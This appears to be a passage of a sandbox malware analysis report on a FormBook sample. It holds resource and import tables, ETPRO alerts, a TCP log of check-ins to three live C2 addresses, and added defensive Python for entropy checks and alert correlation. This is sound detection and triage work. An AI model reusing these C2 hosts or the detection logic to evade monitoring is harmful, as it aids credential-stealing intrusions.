                  RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                  RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                  RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                  RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                  RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
                  RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                  RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                  RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                  RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                  RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                  RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                  RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                  RT_RCDATA | 0xd07b8 | 0x53dc2 | data | | | 1.0003231535124748
                  RT_GROUP_ICON | 0x12457c | 0x76 | data | English | Great Britain | 0.6610169491525424
                  RT_GROUP_ICON | 0x1245f4 | 0x14 | data | English | Great Britain | 1.25
                  RT_GROUP_ICON | 0x124608 | 0x14 | data | English | Great Britain | 1.15
                  RT_GROUP_ICON | 0x12461c | 0x14 | data | English | Great Britain | 1.25
                  RT_VERSION | 0x124630 | 0xdc | data | English | Great Britain | 0.6181818181818182
                  RT_MANIFEST | 0x12470c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
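The section and resource tables above carry the figure a triage analyst looks at first: .rsrc sits at 7.90 bits per byte and its single RT_RCDATA entry (0x53dc2 bytes, ZLIB complexity 1.0003, i.e. it does not compress at all) is where a compiled AutoIt executable typically stores its script payload. The Python below, added here as an example and not Joe Sandbox code, reproduces that per-section entropy check with the standard library only. parse_sections reads just the PE fields needed to slice each section's on-disk bytes; build_synthetic_pe fabricates a non-loadable two-section PE32 skeleton as constructed test input so the script runs offline. To apply it to the real sample, pass the file's bytes to section_entropies instead of the synthetic image.

```python
"""Per-section Shannon entropy of a PE, the check behind a sandbox's 'Entropy' column.

Added example (not Joe Sandbox code). Standard library only.
"""
import math
import struct
from collections import Counter

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes):
    """Walk the section table; returns [(name, virtual_address, virtual_size, raw_offset, raw_size)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    _machine, n_sections, _ts, _psym, _nsym, opt_size, _chars = struct.unpack_from(COFF_HDR, pe, coff)
    table = coff + 20 + opt_size            # section headers follow the optional header
    sections = []
    for i in range(n_sections):
        name, vsize, va, raw_size, raw_ptr, *_ = struct.unpack_from(SECTION_HDR, pe, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), va, vsize, raw_ptr, raw_size))
    return sections


def section_entropies(pe: bytes) -> dict:
    """Entropy of each section's raw (on-disk) bytes, keyed by section name."""
    return {name: shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])
            for name, _va, _vsize, raw_ptr, raw_size in parse_sections(pe)}


def flag_packed_sections(pe: bytes, threshold: float = 7.5) -> list:
    """Names of sections whose raw bytes look compressed or encrypted (entropy >= threshold)."""
    return [name for name, h in section_entropies(pe).items() if h >= threshold]


def build_synthetic_pe(blobs) -> bytes:
    """Constructed test input: a minimal, non-loadable PE32 skeleton carrying (name, bytes) sections."""
    opt_size, file_align, sect_align = 0xE0, 0x200, 0x1000
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * len(blobs)) // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew -> PE signature
    coff = struct.pack(COFF_HDR, 0x14C, len(blobs), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic; rest left zero
    table, body, raw_ptr, va = bytearray(), bytearray(), hdr_len, sect_align
    for name, blob in blobs:
        raw_size = -(-len(blob) // file_align) * file_align        # round up to file alignment
        table += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"), len(blob), va,
                             raw_size, raw_ptr, 0, 0, 0, 0, 0x40000040)
        body += blob.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += -(-len(blob) // sect_align) * sect_align
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)).ljust(hdr_len, b"\0")
    return headers + bytes(body)


if __name__ == "__main__":
    # Constructed image: a zero-filled .data section and a .rsrc section of uniformly distributed bytes.
    sample = build_synthetic_pe([(".data", b"\0" * 0x200), (".rsrc", bytes(range(256)) * 2)])
    for name, h in section_entropies(sample).items():
        print(f"{name:<8} entropy={h:.3f} bits/byte")
    print("high-entropy sections:", flag_packed_sections(sample))
```

The entropy is taken over SizeOfRawData bytes, so a section whose tail is alignment padding reads slightly lower than the data it holds; the report's resource-level ZLIB complexity (1.0003 for the RT_RCDATA blob) is the tighter indicator that a specific blob is already compressed or encrypted. A high-entropy .rsrc on its own is also what a legitimately compiled AutoIt script looks like, so treat the figure as a pointer to the payload to extract, not as a verdict.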
                  DLL | Import
                  WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLL | GetProcessMemoryInfo
                  IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dll | IsThemeActive
                  KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                  Language of compilation system | Country where language is spoken
                  English | Great Britain
                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  07/02/24-13:54:01.230234 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49735 | 80 | 192.168.2.6 | 74.208.236.230
                  07/02/24-13:53:46.839272 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  07/02/24-13:53:54.891246 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  07/02/24-13:53:25.871349 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  07/02/24-13:53:49.739854 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  07/02/24-13:54:03.924989 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49736 | 80 | 192.168.2.6 | 74.208.236.230
                  07/02/24-13:53:46.839272 | TCP | 2856318 | ETPRO TROJAN FormBook CnC Checkin (POST) M4 | 49730 | 80 | 192.168.2.6 | 142.202.6.230
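The seven alerts above are the same FormBook check-in signatures firing against three different external hosts (74.208.236.38, 142.202.6.230, 74.208.236.230) inside roughly forty seconds, which is how FormBook walks its embedded list of decoy and real C2 domains. A single ETPRO hit is easy to triage; the stronger finding is the rotation itself. The Python below is an added example, not Joe Sandbox or Emerging Threats code (the ETPRO rules are proprietary and are only consumed here, not reproduced): it parses alerts in Snort's fast-alert layout and emits one finding when an internal host triggers a FormBook check-in signature against at least three distinct destinations within a 60-second window. The alert lines are constructed from the report's table; the rule revision numbers, the classification text, and the extra line for 192.168.2.9 (a single check-in that must not trigger) are assumptions.

```python
"""Correlate FormBook C2 check-in alerts into one 'C2 rotation' finding per source host.

Added example (not Joe Sandbox or Emerging Threats code). Standard library only.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed from the report's Snort table in Snort fast-alert layout; rev and
# classification fields are assumptions. The last line is an extra host added to
# show that a lone check-in stays below the threshold.
SAMPLE_ALERTS = [
    "07/02/24-13:54:01.230234  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49735 -> 74.208.236.230:80",
    "07/02/24-13:53:46.839272  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49730 -> 142.202.6.230:80",
    "07/02/24-13:53:54.891246  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49733 -> 142.202.6.230:80",
    "07/02/24-13:53:25.871349  [**] [1:2855465:1] ETPRO TROJAN FormBook CnC Checkin (GET) M2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49727 -> 74.208.236.38:80",
    "07/02/24-13:53:49.739854  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49731 -> 142.202.6.230:80",
    "07/02/24-13:54:03.924989  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49736 -> 74.208.236.230:80",
    "07/02/24-13:53:46.839272  [**] [1:2856318:1] ETPRO TROJAN FormBook CnC Checkin (POST) M4 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.6:49730 -> 142.202.6.230:80",
    "07/02/24-13:55:10.000000  [**] [1:2855464:1] ETPRO TROJAN FormBook CnC Checkin (POST) M3 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.2.9:50000 -> 74.208.236.38:80",
]

# Snort fast-alert line: "<ts>  [**] [gid:sid:rev] <msg> [**] ... {PROTO} sip:sport -> dip:dport"
ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\{(?P<proto>\w+)\}\s+(?P<sip>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dip>[\d.]+):(?P<dport>\d+)\s*$"
)


def parse_alert(line: str) -> dict:
    """Parse one fast-alert line into a dict with typed ts/gid/sid/rev/ports."""
    m = ALERT_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised alert line: {line!r}")
    a = m.groupdict()
    a["ts"] = datetime.strptime(a["ts"], "%m/%d/%y-%H:%M:%S.%f")
    for key in ("gid", "sid", "rev", "sport", "dport"):
        a[key] = int(a[key])
    return a


def find_c2_rotation(alerts, min_dests=3, window_s=60.0, msg_filter="FormBook CnC Checkin"):
    """One finding per source host whenever >= min_dests distinct destinations are hit
    by matching alerts inside a sliding window of window_s seconds."""
    by_src = defaultdict(list)
    for a in alerts:
        if msg_filter in a["msg"]:
            by_src[a["sip"]].append(a)
    findings = []
    for sip, rows in by_src.items():
        rows.sort(key=lambda a: a["ts"])
        i = 0
        while i < len(rows):
            start = rows[i]["ts"]
            # rows are sorted, so the in-window alerts form a contiguous run from i
            burst = [a for a in rows[i:] if (a["ts"] - start).total_seconds() <= window_s]
            dests = sorted({a["dip"] for a in burst})
            if len(dests) >= min_dests:
                findings.append({
                    "src": sip,
                    "first_seen": start,
                    "last_seen": burst[-1]["ts"],
                    "destinations": dests,
                    "sids": sorted({a["sid"] for a in burst}),
                })
                i += len(burst)          # do not re-report the same burst
            else:
                i += 1
    return findings


if __name__ == "__main__":
    for f in find_c2_rotation([parse_alert(line) for line in SAMPLE_ALERTS]):
        span = (f["last_seen"] - f["first_seen"]).total_seconds()
        print(f"{f['src']} rotated through {len(f['destinations'])} C2 hosts in {span:.1f}s: "
              f"{', '.join(f['destinations'])} (SIDs {f['sids']})")
```

The threshold and window are tuning knobs: FormBook samples typically carry far more than three domains, so a longer window with a higher destination count trades faster alerting for fewer false positives from a host that merely hits two sinkholed decoys. Keep the per-destination alerts as well; the finding is a summary for the analyst, not a replacement for the underlying signatures.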
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Jul 2, 2024 13:53:25.777050018 CEST | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  Jul 2, 2024 13:53:25.781897068 CEST | 80 | 49727 | 74.208.236.38 | 192.168.2.6
                  Jul 2, 2024 13:53:25.782026052 CEST | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  Jul 2, 2024 13:53:25.871349096 CEST | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  Jul 2, 2024 13:53:25.876225948 CEST | 80 | 49727 | 74.208.236.38 | 192.168.2.6
                  Jul 2, 2024 13:53:26.306562901 CEST | 80 | 49727 | 74.208.236.38 | 192.168.2.6
                  Jul 2, 2024 13:53:26.307066917 CEST | 80 | 49727 | 74.208.236.38 | 192.168.2.6
                  Jul 2, 2024 13:53:26.307158947 CEST | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  Jul 2, 2024 13:53:26.320944071 CEST | 49727 | 80 | 192.168.2.6 | 74.208.236.38
                  Jul 2, 2024 13:53:26.326091051 CEST | 80 | 49727 | 74.208.236.38 | 192.168.2.6
                  Jul 2, 2024 13:53:46.813067913 CEST | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:46.818201065 CEST | 80 | 49730 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:46.818309069 CEST | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:46.839272022 CEST | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:46.844032049 CEST | 80 | 49730 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:48.071429968 CEST | 80 | 49730 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:48.071558952 CEST | 80 | 49730 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:48.071608067 CEST | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:48.344857931 CEST | 49730 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:49.379843950 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:49.717567921 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:49.721026897 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:49.739854097 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:49.744673967 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.251710892 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:51.589421034 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.589438915 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.589519978 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:51.589544058 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:51.589545965 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.589590073 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:51.590509892 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.590563059 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:51.594402075 CEST | 80 | 49731 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:51.594460011 CEST | 49731 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:52.292047977 CEST | 49732 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:52.296983957 CEST | 80 | 49732 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:52.297063112 CEST | 49732 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:52.318998098 CEST | 49732 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:52.323766947 CEST | 80 | 49732 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:52.323997974 CEST | 80 | 49732 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:53.554630041 CEST | 80 | 49732 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:53.554723978 CEST | 80 | 49732 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:53.554786921 CEST | 49732 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:53.829077005 CEST | 49732 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:54.865434885 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:54.871121883 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:54.871335030 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:54.891246080 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:54.896044016 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:56.117063046 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:56.117083073 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:56.117094040 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:53:56.117239952 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:56.117275953 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:56.125910044 CEST | 49733 | 80 | 192.168.2.6 | 142.202.6.230
                  Jul 2, 2024 13:53:56.130664110 CEST | 80 | 49733 | 142.202.6.230 | 192.168.2.6
                  Jul 2, 2024 13:54:01.197640896 CEST | 49735 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:01.204140902 CEST | 80 | 49735 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:01.204231977 CEST | 49735 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:01.230233908 CEST | 49735 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:01.235073090 CEST | 80 | 49735 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:01.751252890 CEST | 80 | 49735 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:01.751272917 CEST | 80 | 49735 | 74.208.236.230 | 192.168.2.6
                  Jul 2, 2024 13:54:01.751373053 CEST | 49735 | 80 | 192.168.2.6 | 74.208.236.230
                  Jul 2, 2024 13:54:02.735456944 CEST | 49735 | 80 | 192.168.2.6 | 74.208.236.230
